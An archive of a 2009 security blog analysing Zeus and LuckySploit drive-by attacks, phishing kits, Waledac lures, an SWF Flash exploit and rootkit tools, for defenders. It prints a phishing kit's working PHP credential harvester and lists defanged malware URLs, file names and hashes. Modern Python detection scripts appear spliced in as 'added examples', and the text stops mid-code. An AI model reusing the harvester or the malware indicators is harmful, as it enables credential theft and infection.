Saturday, February 28, 2009
Rootkit Analytics: Updates
One more tool will be released by Ryan for Linux Kernel-mode rootkits, "SiD (Symbol Interception Detection)". We are still working on the content and the Windows User-mode Rootkit analysis tool by Naga.
The most probable release date for RootkitAnalytics.com would be Mar 8th, 2009.
- EF
Friday, February 27, 2009
LuckySploit, the right hand of Zeus
These obfuscated scripts are currently being used by the Zeus botnet to recruit zombie PCs through Drive-by-Download attacks.
When accessing the website, only a blank page is displayed, but checking its source code reveals code written in JavaScript like this:
The script is encrypted with the RSA algorithm. This information is displayed at the end of the code.
Another interesting fact is that the script is served only once: if you return to the same address and check the HTML source code again, the script is no longer there.
Some of the domains that contain LuckySploit are reflected below:
It's worth noting that many of these URLs are active, so if you decide to access any of them, keep in mind the safety measures appropriate to the case.
In some scripts a message can clearly be read at the end of the code:
attack_level = 0;
try {
f = 'Welcome to LuckySploit:) \n ITS TOASTED';
In this way, Zeus adds the infected computer to its network of compromised machines.
Related information:
Zeus botnet. Mass propagation of trojan. Part two - Spanish version
Zeus botnet. Mass propagation of trojan. Part one - Spanish version
Malware attack via Internet - Spanish version
# Jorge Mieres
Wednesday, February 25, 2009
Phishing Kit In-the-Wild for cloning of web site, version 2
This kit has expanded its "coverage" of fraud: a second package offers a large number of fake websites designed to look transparent to the user and capture their information.
The phishing kit keeps the same structure as the earlier pack, i.e. an index.html file that is a faithful copy of the real page, a login.php and a .txt file, but now the sites cloned to steal data are:
Adult Friend Finder
Amazon
Bebo
Break
DeviantArt
FlickR
FreeWebs
GeoCities
LiveJournal
Playstation Underground
PornoTube
SendSpace
SourceForge
Studivz
Tagged
Tripod - Lycos
Veoh
WWE
Xanga
XTube - Images R Broken
On the one hand, strategies that seek to raise money without major effort are becoming more aggressive and more invasive; on the other hand, most of these kits are available online for free or for payment, in this case for a sum of money not as high as that of similar packs.
Phishing attacks are becoming more dangerous because their creators seek efficiency in developing copies as faithful as possible to the real sites. Combined with intrusive techniques such as malware kits (ElFiesta, MPack, IcePack, etc.) implanted on ghost or compromised servers to disseminate phishing, this represents a growing risk both for those who do not know how these attack techniques work and even for those who know them well.
Related Information
Phishing Kit In-the-Wild for cloning of web site
# Jorge Mieres
Tuesday, February 24, 2009
Zeus botnet. Mass propagation of trojan. Part two
The map below shows information regarding each host infected by Zeus, each identified by a point. Although at first glance the information shown in the map may seem inadequate, it must be remembered that each node can represent multiple IP addresses or domains hosted on one server, so the actual percentage of infected machines may be higher.
Although the list is very small compared with the number of domains hosting Zeus, it is extremely important that administrators block them in their network infrastructure to avoid infection.
Furthermore, each of the domains, along with its IP address, represents an infected host or a compromised server.
Given that the spreading methods employed by Zeus are email and Drive-by-Download through different exploits, of which one of the best known is LuckySploit, or sites vulnerable to having malware kits such as ElFiesta implanted, it is extremely important to block the domains and IP addresses I have outlined.
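As an added example (not code from the original post), the following Python script turns indicator lines written in the defanged "IP domain/path .ext" layout used in these posts into a host and IP blocklist; the addresses and domains in the embedded sample are constructed placeholders, not values from the page.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample in the defanged layout used by the post: an optional IP,
# a URL without scheme, and a space inserted before the file extension.
# All addresses and domains here are placeholders (RFC 5737 / .invalid).
SAMPLE_LINES = """\
198.51.100.7 example-loader.invalid/tmp/ldr .exe
198.51.100.7 example-loader.invalid/zv/cfg .bin
203.0.113.9/g1/data
http://example-config.invalid/utility/backup/config .bin
"""

# Leading IPv4 address followed by whitespace is optional; the rest is the URL.
LINE_RE = re.compile(r"^(?:(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+)?(?P<url>\S.*)$")


def refang(url):
    """Remove the space the post inserts before the extension ('ldr .exe' -> 'ldr.exe')."""
    return re.sub(r"\s+\.", ".", url.strip())


def parse_line(line):
    """Return (ip or None, host or None, path) for one indicator line, None for blank lines."""
    line = line.strip()
    if not line:
        return None
    m = LINE_RE.match(line)
    ip = m.group("ip")
    url = refang(m.group("url"))
    if "://" not in url:
        url = "http://" + url  # urlsplit needs a scheme to find the host
    parts = urlsplit(url)
    host = parts.hostname
    # A bare IP in the URL position is itself the address to block.
    try:
        ipaddress.ip_address(host)
        ip = ip or host
        host = None
    except ValueError:
        pass
    return ip, host, parts.path


def build_blocklist(text):
    """Collect unique IPs and hostnames from many indicator lines."""
    ips, hosts = set(), set()
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, host, _ = rec
        if ip:
            ips.add(ip)
        if host:
            hosts.add(host)
    return sorted(ips, key=ipaddress.ip_address), sorted(hosts)


def render_hosts_file(hosts):
    """Render hostnames as sinkhole entries for a hosts file."""
    return "\n".join(f"0.0.0.0 {h}" for h in hosts) + "\n"


if __name__ == "__main__":
    ips, hosts = build_blocklist(SAMPLE_LINES)
    print("IPs to block:", ", ".join(ips))
    print(render_hosts_file(hosts))
```

The IP list can be fed to a firewall deny rule and the hosts output to a DNS sinkhole or local hosts file.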
Related Information
Zeus botnet. Mass propagation of trojan. Part one
# Jorge Mieres
Monday, February 23, 2009
Spammers spreading malware through Oscar 2009 award messages
SOURCE:
REDIRECTED TO
hxxp://xp-police-09.com - spreading HTTP Fake Codec
hxxp://liteantispywareproscanner.com - spreading TROJ_FAKEAV.TJ
hxxp://scanlog6.com - spreading Js.downloader
hxxp://goscanbay.com - contains 37 exploits (http://google.com/safebrowsing/diagnostic?site=goscanbay.com/)
hxxp://stabilitytraceweb.com - spreading Trojan-Downloader.Win32.FraudLoad.vkva (detected by Kaspersky)
Search tags:
oscar_winners, oscar awards, oscar_schedule, printable_oscar_ballot 2009, oscar_ballot, oscar_results, oscar_party_food, oscar_awards_2009, oscars_time, oscars_on_tv, oscar_live_stream, oscar_night, oscar_pre_show, oscar_coverage, what_time_do_the_oscars_start, what_channel_are_the_oscars_on, oscar_picks, oscar_red_carpet_live, abc_oscars, oscar_odds, watch_oscars_online, miley_cyrus_oscars, oscars_2009_time, oscar_bingo, oscars_tonight, oscar_predictions, 2009 Oscar winners
- Analysis by Kalyan
Spyware Analytics: Forum to choose...
We are in the process of finding out the best forum software to use. "Best" is a relative term, and always depends on what one is looking for.
* Security
* Usability
* Look & Feel
* Features
We looked at http://www.forummatrix.org/ and other sites that give comparisons of forum software. Many sites list Discusware and FuseTalk as the two most secure forum packages, though we like the really cool look and feel of IP.Board from InvisionBoard. But being a security forum, we should give first preference to security, as listed first among the four things we are looking for.
If you have any suggestions, experiences and more that you wouldn't mind sharing with us, contact us at contact.fingers @ gmail.com
- EF
Sunday, February 22, 2009
Malware Analytics: Status update - Releasing very soon
The MalwareAnalytics portal will be released in 2-3 weeks. The static part and backend are complete, and we are about to complete the dynamic part. Thanks to Bonfa and his 2 friends for their hard work and dedication. We have also worked on load balancing, anti-reversing and anti-virtual-machine detection.
If you guys know any reliable and cost effective, dedicated-server hosting services or data centers, kindly contact us at contact.fingers @ gmail.com.
- EF
Saturday, February 21, 2009
Google Groups again used to spread porn spam
In recent days, the mailboxes of millions of users have been bombarded by a significant amount of spam about erotic or pornographic videos of celebrities, using the Google Groups service to disseminate it.
Some of the phrases used in the case to capture the attention of the users are:
Hey! It is Erica. Wanna date?
Hi! This is Dana from last Monday video shoot. Hello!
It is Norma. Couldn't reach you.
Jessica Alba was caught naked in sauna!
Jennifer Aniston was caught naked in sauna!
Jennifer Love Hewitt's nude beach photos!
Cameron Diaz's nude beach photos!
Denise Richards's fitting room hidden pics!
Shakira and her mystery boyfriend pics!
Hi! It is Deena. Fresh teens who just got legal to pose.
Hi! This is Amelia. Fresh teens who just got legal to pose.
On the other hand, some of the profiles used in the service in question are:
The list is too long to reproduce every address in this post; however, these examples are enough to give an idea, in sufficient detail, that spam is a problem affecting everyone equally and that today it is one of the most exploited channels.
# Jorge Mieres
Detecting Kernel-Level Rootkits Through Binary Analysis
Abstract
Rootkits are tool sets used by intruders to modify the perception that users have of a compromised system. In particular, these tools are used by attackers to hide their actions from system administrators. Originally, rootkits mainly included modified versions of system auditing programs (e.g., ps or netstat on a Unix system). However, for operating systems that support loadable kernel modules (e.g., Linux and Solaris), a new type of rootkit has recently emerged. These rootkits are implemented as kernel modules, and they do not require modification of user space binaries to conceal malicious activity. Instead, the rootkit operates within the kernel, modifying critical data structures such as the system call table or the list of currently-loaded kernel modules.
This paper presents a technique that exploits binary analysis to ascertain, at load time, if a module's behavior resembles the behavior of a rootkit. Through this method, it is possible to provide additional protection against this type of malicious modification of the kernel. Our technique relies on an abstract model of module behavior that is not affected by small changes in the binary image of the module. Therefore, the technique is resistant to attempts to conceal the malicious nature of a kernel module.
Keywords: Rootkits, Binary Analysis, Kernel Hardening.
This paper is available here.
- EF
Xprobe2 PCAPs
The PCAPs are available here.
For more on Xprobe, click here for the Blackhat'03 slides; the full PDF version of the formal paper is available here. Though this paper was released in 2003, the idea is still current and forward-looking. Thanks to Ofir Arkin, Fyodor Yarochkin and Meder Kydyraliev for their research.
If you find any glitches, errors or questions... contact us at contact.fingers @ gmail.com.
- EF
Friday, February 20, 2009
Welcome our new blogger! - Joe from Joebox.org
You could submit your binaries here for analysis.
The architecture of Joebox can be found here:
Version 5.0 [Latest]
Version 4.0
Version 3.0
Version 2.0
Version 1.0
If you have any questions contact info @ joebox.org and they would respond to your question.
- EF
SecureQEMU
Thanks to Joe from www.Joebox.org for leading us to this interesting paper.
Read and Enjoy!!!
- EF
Attacks - Weaknesses of security commonly exploited
Unlike years ago, when people with extensive skills in the computer world enjoyed researching these issues with the aim of gaining more knowledge, the scene has now been completely distorted, giving rise to new characters who use computer resources and their knowledge of how systems operate as tools to commit crime and obtain economic benefit.
Every day new vulnerabilities are discovered and, usually, only those responsible for IT appreciate in its true measure the importance of security and how to address the serious problem that lies behind vulnerabilities which allow an attacker to breach a secure environment and commit crimes using the stolen data.
Click here to read more...
- EF
Analysis of a web-based malware attack
Abstract: The Internet has become an allied attack platform for malware creators who, through the use of different techniques such as Drive-by-Download, Drive-by-Update, scripting and exploits, among others, and combinations of them, seek to recruit a whole army of computers that respond only to their malicious instructions.
These attacks, which use the Internet as the base from which to execute harmful payloads directly on the victim system, in parallel, almost instantly and transparently to less experienced users, have become a latent and dangerous risk of infection from the simple act of accessing a website.
The following document presents a concrete example that relies on the actions mentioned above to exploit and infect a victim system, also describing several extra characteristics that increase the damage done by the malware.
Click here to read more...
- EF
Thursday, February 19, 2009
SpywareAnalytics: Analytics forum for everyone...
Security forum for researchers, engineers, analysts and home users to encourage discussions and provide solutions for spyware analytics and related questions. This is a futuristic project and requires dedicated volunteering. If you would like to be a part of this project, contact us at contact.fingers @ gmail.com. Before you send us an email, kindly:
* ensure that you are cool with dedicating a few hours/week,
* ensure that you would consider this as one of your top priority tasks,
* ensure that you would not do this just for your resume.
- EF
Wednesday, February 18, 2009
Zeus botnet. Mass propagation of trojan. Part one
Zeus (also known as Zbot or wsnpoem) falls squarely into the category of fraudulent and malicious code. It is basically a trojan designed to recruit zombie PCs and carry out phishing attacks against financial institutions, banks and social networking sites, stealing email authentication data, FTP accounts, etc., combining scripting, exploits and other techniques.
It is quite dangerous if we consider that, in addition to the typical actions of the malware, it can be obtained by anyone who deposits a certain amount of money in the account of its creators.
Perhaps this is one of the best reasons why the many variants of "Zeus" that are In-the-Wild are looking to recruit our systems as zombies. The truth is that, although it does not live up to its name, it is one of the largest botnets of the moment.
Even though this last distinction is threatened by other "alternatives" in the botnet world such as Waledac, the recent Adrenalin, or the smaller (in magnitude) Asprox (also known as Danmec), we really must be careful not to fall victim to these threats, which are always looking to carry out their mission successfully: to get our money and computing resources.
Related information
Waledac more loving than ever Spanish version
Danmec Bot, Fast-Flux networks and recruitment of Zombies PCs Spanish version
# Jorge Mieres
Trojan Analytics: Backend DB
Trojan Analytics is a portal aimed at the research and analysis of Trojans. As mentioned in one of the previous blogs, "Trojan Analytics - Coming Soon", Trojan Analytics will concentrate on different types of Trojans including [but not limited to] application-layer Trojans, Trojan backdoors, Trojan bots, Trojan rootkits, and more.
To put this together, we are talking to MegaSecurity.org and other sites to create a back-end capable enough to help us in the analysis and classification of the Trojans that we discover. Naming conventions, family tree/type classification, etc. are currently being sorted out.
- EF
Tuesday, February 17, 2009
Rootkit Analytics: Detection Techniques
Detection techniques can be classified into the following basic categories:
- Signature-based Detection
- Heuristics-based Detection
- Comparison-based Detection:
§ Cross-view based Detection
§ Integrity-based Detection
For more on our reviews and research, stay tuned.
- EF
Monday, February 16, 2009
Phishing Kit In-the-Wild for cloning of web site
This kit suggests just that: phishing. It is a set of web pages from popular sites, ready to be uploaded to a ghost server and spread (by spam) through social engineering, since, as it cannot be otherwise, it exploits the weakest link in the security chain: the human factor.
For the moment, and I say for now because those who distribute this kit will surely expand the range of cloned sites, the phishing targets are:
AOL.com
AIM.com
d2jsp.org
DailyMotion.com
eBay.com
EverQuest Forum
FaceBook.com
FileFront.com
Gmail.com
Gmail.de
Habbo.de
Habbohotel.com
ICQ.com
store.apple.com
Megaupload.com
MMOCheats.com
Myspace.com
Nexon.net
OGame.de
Oxedion.de
dhl.de (Packstation)
PayPal.com
PhotoBucket.com
RapidShare.com
RapidShare.de
Ripway.com
siteworld.de
Skype.com
store.steampowered.com
Strato.com
Usenext.com
VanGuard
Yahoo.com
YouTube.com
As you can see, many of these pages are heavily used and widely known.
Each of the folders containing a clone holds, in addition to index.html, a plain text file where the victim's captured information is stored and a login.php which contains the following code:
<?php
header('Location: website');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Here header('Location: website') holds the address of the real website the victim is redirected to, and $handle = fopen("log.txt", "a") opens the text file log.txt in append mode for writing; each submitted form field is then recorded as name=value on its own line.
Most of these clones are active, so it is necessary to be vigilant when accessing websites whose services look similar.
On the other hand, it clearly shows that the kit was designed to commit fraud, and the fact that it is available on the Internet makes it even more dangerous, boosting the chances of users becoming victims of these fraudulent actions.
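As an added example (not part of the kit or of the original post), a small Python scanner that a web-site administrator could run over a document root to flag PHP files showing the same three-part harvesting pattern described above: a Location redirect, a log file opened for appending, and a loop that dumps every $_POST field. The two PHP samples embedded in it are constructed.

```python
import re
from pathlib import Path

# Markers of the harvesting pattern: redirect the victim away, open a log for
# append, dump every POST field. Each alone is common in legitimate PHP; all
# three together in one short file match the kit's login.php closely.
MARKERS = {
    "redirect":   re.compile(r"header\s*\(\s*['\"]Location:", re.I),
    "append_log": re.compile(r"fopen\s*\([^)]*,\s*['\"]a\+?['\"]\s*\)", re.I),
    "post_dump":  re.compile(r"foreach\s*\(\s*\$_POST\b", re.I),
}


def score_php(source):
    """Return the set of marker names present in one PHP source string."""
    return {name for name, rx in MARKERS.items() if rx.search(source)}


def is_harvester(source):
    """True only when all three markers are present."""
    return score_php(source) == set(MARKERS)


def scan_tree(root):
    """Walk a web root; return [(path, sorted markers)] for files matching all markers."""
    hits = []
    for path in Path(root).rglob("*.php"):
        try:
            src = path.read_text(errors="replace")
        except OSError:
            continue  # unreadable file, skip rather than abort the scan
        if is_harvester(src):
            hits.append((str(path), sorted(score_php(src))))
    return hits


# Constructed sample: the kit-style login.php described in the post.
KIT_LOGIN = """<?php
header('Location: website');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) { fwrite($handle, "$variable=$value\\r\\n"); }
fclose($handle);
?>"""

# Constructed sample: a benign login handler that redirects but stores nothing on disk.
BENIGN = """<?php
session_start();
if (isset($_POST['user'])) { $_SESSION['user'] = $_POST['user']; }
header('Location: /home.php');
?>"""


if __name__ == "__main__":
    import sys
    for hit in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print("suspicious:", *hit)
```

Matches should be reviewed by hand; a world-readable log.txt sitting next to the flagged file is a strong confirming sign.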
# Jorge Mieres
Sunday, February 15, 2009
IRC Channel for EvilFingers Community
You are most welcome to join #evilfingers in freenode for any related discussions.
- EF
Rootkit Analytics - Part 2
As discussed in previous blogs, we are working on the different layers of rootkit analytics. The first version of our website [www.RootkitAnalytics.com - Coming Soon!!!] will be releasing by the end of Feb 2009. Stay Tuned!!!
We are looking for volunteers with the following specialties:
- Processor/Microcode Experience
- BIOS Programming Experience
- Kernel Programming Experience
But, if you are experienced in rootkits or anything related to the same, kindly contact us as soon as possible, and we will work out a plan customized just for you.
- EF
Rootkit Analytics
User-mode Rootkit Analytics:
Our first tool in this category would be SpyDLL, which monitors injected processes and the modules injected inside them. We also provide an option for the user to remove a DLL without shutting down the process, and an option to terminate the process itself. This tool will keep expanding just like any other tool on our site.
Our next tool in user-mode rootkit analytics would be WinInternals. This tool will give anything and everything required for Windows-based user-mode rootkit analytics, including an extended edition of Process Memory Dumper [PMD].
Kernel-mode Rootkit Analytics:
Our first tool in this category would be ElfStat. More about this tool will be discussed in the near future.
The following are our members [sorted alphabetically] in Rootkit Analytics team so far:
Team Leads:
Kirk McGraw [Team Lead/Creator: WinInternals]
Nagareshwar Talekar [Team Lead/Creator: SpyDLL]
Ryan O'Neill [Team Lead/Creator: Elfstat]
Team Members:
Blake Hartstein [Team Member]
There are others whom we are still communicating with, for them to become a part of our team. The normal procedure of joining Rootkit Analytics is to either join EvilFingers in any of the teams and then once the member has proven their skills, they would be moved to any of our analytics divisions depending on their skill set. But we do consider direct volunteering for Rootkit Analytics division if you have prior hands-on anti-rootkit or related experience.
We are still working on expanding our research to other directions such as, application, hardware and firmware rootkits.
Contact us at contact.fingers @ gmail.com [because GMAIL rocks].
- EF
Saturday, February 14, 2009
Waledac more loving than ever
For about a month, this worm has been spreading its campaign using as an excuse, and ahead of time, the day of love that is celebrated today, February 14, worldwide.
Now, it seems to have saved its entire battery of visual social-engineering strategies for this day, renewing its whole repertoire by displaying the following images:
More pictures
reader.exe MD5: A9286212E0D7B46841C860FD3F058DFA
valentine_card.exe
loveu.exe
start.exe
val.exe
programm.exe
luv.exe
luvu.exe
patch.exe MD5: 1C5E4A7FCBE766133F743C9A0150373D
loveexe.exe MD5: 5C17F98919D2C84C3FD1908630396BB7
mylove.exe
cardviewer.exe MD5: E2F9C7A76581047D493FDE2C4A02737A
As seen in the VirusTotal reports, Waledac currently has a low level of detection by antivirus signatures, i.e. it has changed not only its repertoire of images but also the code of the binaries, which makes it even more dangerous.
Waledac, Social Engineering and San Valentine Day In Spanish post
# Jorge Mieres
Friday, February 13, 2009
Trojan Analytics - Coming Soon
Thursday, February 12, 2009
Lavasoft ARIES Rootkit Remover
One click scan GUI:
Dialogue box indicating acceptance of critical action:
Ends with results page:
Now, how simple is that. It took less than 30 seconds for the entire scan process. This is a specialized tool, hence its timing cannot be compared with the efficiency of other, generic anti-rootkit tools.
If you wish to volunteer for this project, kindly email us at contact.fingers @ gmail.com
- EF
Waledac, Social Engineering and San Valentine Day
Our mailboxes are examples of this situation. Valentine's Day (or its fans) is one of them, and if we look a little at the spam that inundates us, we see that many messages make some reference to the upcoming celebration.
In fact, Waledac began its campaign well before, using as a spreading decoy the typical image alluding to love, through which a binary called love.exe is downloaded that, far from being loving, turns your computer into a zombie.
As a bonus, earlier this year, in addition to downloading the malware, the page contained malicious exploits. Among the domains were:
googol-analisys .com, seocom .name, seocom .mobi, seofon .net, goog-analysis .com
Recently, however, the developers have migrated to another image that seeks the same degree of "tenderness" to get Waledac downloaded.
Some of the names used for the binary:
lovekit.exe
mylove.exe
loveprogramm.exe
love.exe
loveexe.exe
barack.exe
postcard.exe
devkit.exe
runme.exe
you.exe
onlyyou.exe
youandme.exe
card.exe
ecard.exe
val.exe
install.exe
Waledac uses Fast-Flux networks; some of the domains used to propagate it are:
Many compare it to other malicious code such as Nuwar (also known as Storm or the Storm worm) because of the similarity of their spreading strategies and of the malicious activities performed on the infected computer. However, the reality is that Waledac is a dangerous malicious code that has become one of the largest botnets of the time.
Related information:
Understanding Fast-Flux networks
Danmec Bot, Fast-Flux networks and recruitment of zombie PCs (Spanish version)
# Jorge Mieres
Wednesday, February 11, 2009
Panda Anti-Rootkit
We will soon be collecting and analyzing rootkits with pre-existing toolkits such as this one, and comparing the tools at various stages:
- Preparation & Detection/Monitoring
- Containment/Isolation
- Eradication/Quarantine
- Recovery/Patching
We will look at the various characteristics such as time taken and the overall cleaning process too.
To start with, Panda Anti-Rootkit opens with a one-click screen from which users can scan for rootkits:
Once the users have chosen whether to allow auto-update or not, and whether to run an in-depth scan [which is recommended, since simple scans may be fast, but what is fast is not always efficient], the software takes you to a reboot screen that lets the user restart the system to apply the changes [it is recommended to reboot the system before the scan]:
Once the system reboots, the scanning process starts automatically with the following 6 layers of scan:
- Running Processes
- Windows Registry
- User and kernel hooks
- Services and Drivers
- Files and ADS
- Evaluating Incidents
Second snapshot, showing progress in the scanning process:
When the process has come to an end, a report is listed as seen in the following image:
If you wish to participate or if you have questions, email us at contact.fingers @ gmail.com.
-EF
Tuesday, February 10, 2009
Exploiting vulnerabilities through SWF
The same wave of attacks using malicious JavaScript files, mentioned in the post on exploiting vulnerabilities through .js files, has been combined with other alternatives such as this one.
In this case, it exploits a vulnerability in Adobe Flash Player described in CVE-2007-0071, by which a maliciously crafted .swf file causes a buffer overflow that allows code execution by a remote attacker.
This means that if the user accesses, for example, the URL http://www.710sese .cn/a1 / (59.34.197.115), the file f16.swf (MD5: 95EC9202FBE74D508205442C49825C08) is executed, which according to the VirusTotal report is detected by 18 of the 39 antivirus engines that scanned the sample. The exploit embedded in the .swf triggers the vulnerability if the application is installed and vulnerable.
Some of the URLs used to spread the exploit are:
http://www.710sese .cn/a1/f16 .swf
http://www.710sese .cn/a1/f28 .swf
http://www.710sese .cn/a1/f45 .swf
http://www.710sese .cn/a1/f47 .swf
http://www.710sese .cn/a1/f64 .swf
http://www.710sese .cn/a1/f115 .swf
http://www.710sese .cn/a1/i28 .swf
http://www.710sese .cn/a1/i16 .swf
http://www.710sese .cn/a1/i45 .swf
http://www.baomaaa .cn/a279/f16 .swf
http://www.baomaaa .cn/a279/f28 .swf
http://www.baomaaa .cn/a279/f45 .swf
http://www.baomaaa .cn/a279/f47 .swf
http://www.baomaaa .cn/a279/f64 .swf
http://www.baomaaa .cn/a279/f115 .swf
http://www.baomaaa .cn/a279/i28 .swf
http://www.baomaaa .cn/a279/i16 .swf
http://www.baomaaa .cn/a279/i45 .swf
http://000.2011wyt .com/versionff .swf
http://000.2011wyt .com/versionie .swf
http://sss.2010wyt .net/versionie .swf
http://sss.2010wyt .net/versionff .swf
http://www.misss360 .cn/versionff .swf
http://www.misss360 .cn/versionie .swf
http://daoye.sh .cn/a08_1272/m16 .swf
http://daoye.sh .cn/a08_1272/m28 .swf
http://daoye.sh .cn/a08_1272/m45 .swf
http://ccsskkk .cn/new7/fl/f16 .swf
http://ccsskkk .cn/new7/fl/f28 .swf
http://ccsskkk .cn/new7/fl/f45 .swf
http://ccsskkk .cn/new7/fl/f47 .swf
http://ccsskkk .cn/new7/fl/f64 .swf
http://1.ganbobo .com/template/kankan/js/4.0/curtain .swf
http://1.ganbobo .com/template/kankan/js/4.0/playerctrl .swf
Once the exploit runs on the computer, it downloads the binary a1.css from http://d.aidws .com new, malicious code we have already mentioned in another post.
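When a wave of .swf files like the one above turns up, the first triage step is to look inside the container rather than execute it: check the signature, inflate CWS files, and enumerate the tag records. The Python below is an added example (not code from this post or from Adobe) that does exactly that and reports the SceneCount declared by any DefineSceneAndFrameLabelData tag (tag code 86). Linking that tag to CVE-2007-0071 is background knowledge, not something the post states, so treat it as an assumption; the sample file is constructed in code, not one of the listed .swf files.

```python
import struct
import zlib

# Tag code publicly associated with CVE-2007-0071 (DefineSceneAndFrameLabelData);
# the association is background knowledge, not something the post states.
DEFINE_SCENE_AND_FRAME_LABEL_DATA = 86
TAG_NAMES = {0: "End", 1: "ShowFrame", 86: "DefineSceneAndFrameLabelData"}


def decode_u32(buf, pos):
    """Decode an SWF EncodedU32 (7 bits per byte, little-endian, at most 5 bytes)."""
    value, shift = 0, 0
    for i in range(5):
        b = buf[pos + i]
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos + i + 1
        shift += 7
    raise ValueError("EncodedU32 longer than 5 bytes")


def encode_u32(value):
    """Inverse of decode_u32; used only to build the constructed sample."""
    out = bytearray()
    while True:
        b, value = value & 0x7F, value >> 7
        out.append(b | 0x80 if value else b)
        if not value:
            return bytes(out)


def swf_body(data):
    """Validate the 8-byte header and return (version, declared_length, plain body)."""
    if len(data) < 8:
        raise ValueError("too short to be an SWF")
    sig, version = data[:3], data[3]
    length = struct.unpack_from("<I", data, 4)[0]
    if sig == b"FWS":
        body = data[8:]
    elif sig == b"CWS":
        body = zlib.decompress(data[8:])  # CWS: everything after the header is zlib-compressed
    else:
        raise ValueError("not an SWF signature: %r" % sig)
    return version, length, body


def parse_tags(data):
    """Return [(code, length, payload), ...] for every tag record, in file order."""
    _, _, body = swf_body(data)
    nbits = body[0] >> 3                  # RECT: 5-bit Nbits, then 4*Nbits bits
    pos = (5 + 4 * nbits + 7) // 8        # rounded up to whole bytes
    pos += 4                              # frame rate (UI16) + frame count (UI16)
    tags = []
    while pos + 2 <= len(body):
        hdr = struct.unpack_from("<H", body, pos)[0]
        pos += 2
        code, tlen = hdr >> 6, hdr & 0x3F
        if tlen == 0x3F:                  # long form: explicit UI32 length follows
            tlen = struct.unpack_from("<I", body, pos)[0]
            pos += 4
        tags.append((code, tlen, body[pos:pos + tlen]))
        pos += tlen
        if code == 0:                     # End tag
            break
    return tags


def triage(data):
    """Summarise a file: compression, version, whether the declared length matches,
    the tag codes present, and the SceneCount of any DefineSceneAndFrameLabelData tag."""
    version, length, body = swf_body(data)
    tags = parse_tags(data)
    scene_counts = [decode_u32(p, 0)[0] for code, _, p in tags
                    if code == DEFINE_SCENE_AND_FRAME_LABEL_DATA and p]
    return {
        "compressed": data[:3] == b"CWS",
        "version": version,
        "length_ok": length == len(body) + 8,
        "tag_codes": [code for code, _, _ in tags],
        "scene_counts": scene_counts,
    }


def build_sample(scene_count=1, compress=False):
    """Constructed minimal SWF (one scene tag, ShowFrame, End); not a file from the post.
    A large scene_count declares far more scenes than the tag carries, the kind of
    mismatch a triage check should surface before the file is ever opened in a player."""
    scene_tag = encode_u32(scene_count) + encode_u32(0) + b"\x00" + encode_u32(0)
    tags = struct.pack("<H", (DEFINE_SCENE_AND_FRAME_LABEL_DATA << 6) | len(scene_tag)) + scene_tag
    tags += struct.pack("<H", 1 << 6)     # ShowFrame
    tags += struct.pack("<H", 0)          # End
    rest = b"\x00" + struct.pack("<HH", 0x1800, 1) + tags  # empty RECT, 24 fps, 1 frame
    total = 8 + len(rest)
    if compress:
        return b"CWS" + bytes([9]) + struct.pack("<I", total) + zlib.compress(rest)
    return b"FWS" + bytes([9]) + struct.pack("<I", total) + rest


if __name__ == "__main__":
    for name, sample in (("plain", build_sample()), ("cws", build_sample(compress=True))):
        print(name, triage(sample))
```

Run against a real sample, the tag list alone is informative: a file served from a /a1/ directory that consists of one scene tag and an End tag, with no shapes or frames worth showing, has no reason to exist as content.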
Related information:
Exploitation of vulnerabilities through JS
# Jorge Mieres
Monday, February 9, 2009
SpyDLL Eraser - Rootkit Analytics Tool
Title : SpyDLL Eraser ( win32 GUI application)
==========================================
Description : Tool to remove the specified DLL from one or more processes. Many trojan backdoors, rootkits, and other malware and spyware processes inject their DLL into legitimate processes [explorer.exe, lsass.exe, etc.] to keep their activities hidden and to protect themselves from being killed. Some use DLL injection, while others use a plugin approach to get their DLL loaded into these legitimate processes. This tool helps distinguish normal DLLs from malicious DLLs and helps the user erase them completely.
Features :
* List all running processes
* For each process the following information is displayed
+ process name
+ full path
+ company name
+ version
+ size
+ process start time
+ process memory details
+ modified/access date
* Display specific icons for different kinds of processes, such as system processes and services
* For the selected process, display all loaded DLLs with the following information
+ DLL name
+ Full path
+ Company Name
+ Size
+ Load/Reference count
+ Modified/access date
* Differentiate between statically and dynamically loaded DLLs. The user should be able to select only dynamically loaded DLLs.
* DLL search feature to look for a specified DLL in all running processes and list those processes
* Remove the user-specified DLL from all running processes automatically.
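The feature that does the real work in the list above is telling statically loaded DLLs apart from dynamically loaded ones: a module that is in the process's import table on disk was loaded by the loader, whereas one that is not was brought in at run time, by LoadLibrary, a plugin mechanism or injection. The Python below is an added illustration of that classification, not SpyDLL Eraser's own code; it takes the two inputs the tool would collect on a live system (the import table names and the loaded module paths) as constructed lists, and the directory heuristics are assumptions.

```python
import ntpath

# Constructed inputs standing in for what the tool collects on a live system:
# (a) DLL names from the process image's static import table (PE headers on disk),
# (b) the modules currently loaded in the process, with their on-disk paths.
STATIC_IMPORTS = ["KERNEL32.dll", "USER32.dll", "SHELL32.dll", "ADVAPI32.dll"]
LOADED_MODULES = [
    r"C:\Windows\explorer.exe",
    r"C:\Windows\System32\kernel32.dll",
    r"C:\Windows\System32\user32.dll",
    r"C:\Windows\System32\shell32.dll",
    r"C:\Windows\System32\advapi32.dll",
    r"C:\Windows\System32\ntdll.dll",
    r"C:\Users\victim\AppData\Local\Temp\spy.dll",   # constructed placeholder name
]

# Heuristics (assumptions): system directories are trusted more than
# user-writable locations, which are where injected DLLs usually live.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")


def classify_modules(static_imports, loaded_modules):
    """Label each loaded DLL as static (in the import table) or dynamic, and flag
    dynamic DLLs that do not live in a system directory."""
    imports = {name.lower() for name in static_imports}
    entries = []
    for path in loaded_modules:
        low = path.lower()
        name = ntpath.basename(low)
        if name.endswith(".exe"):
            continue  # the main image itself, not a DLL
        entry = {
            "path": path,
            "name": name,
            "static": name in imports,
            "dynamic": name not in imports,
            "system_dir": low.startswith(SYSTEM_DIRS),
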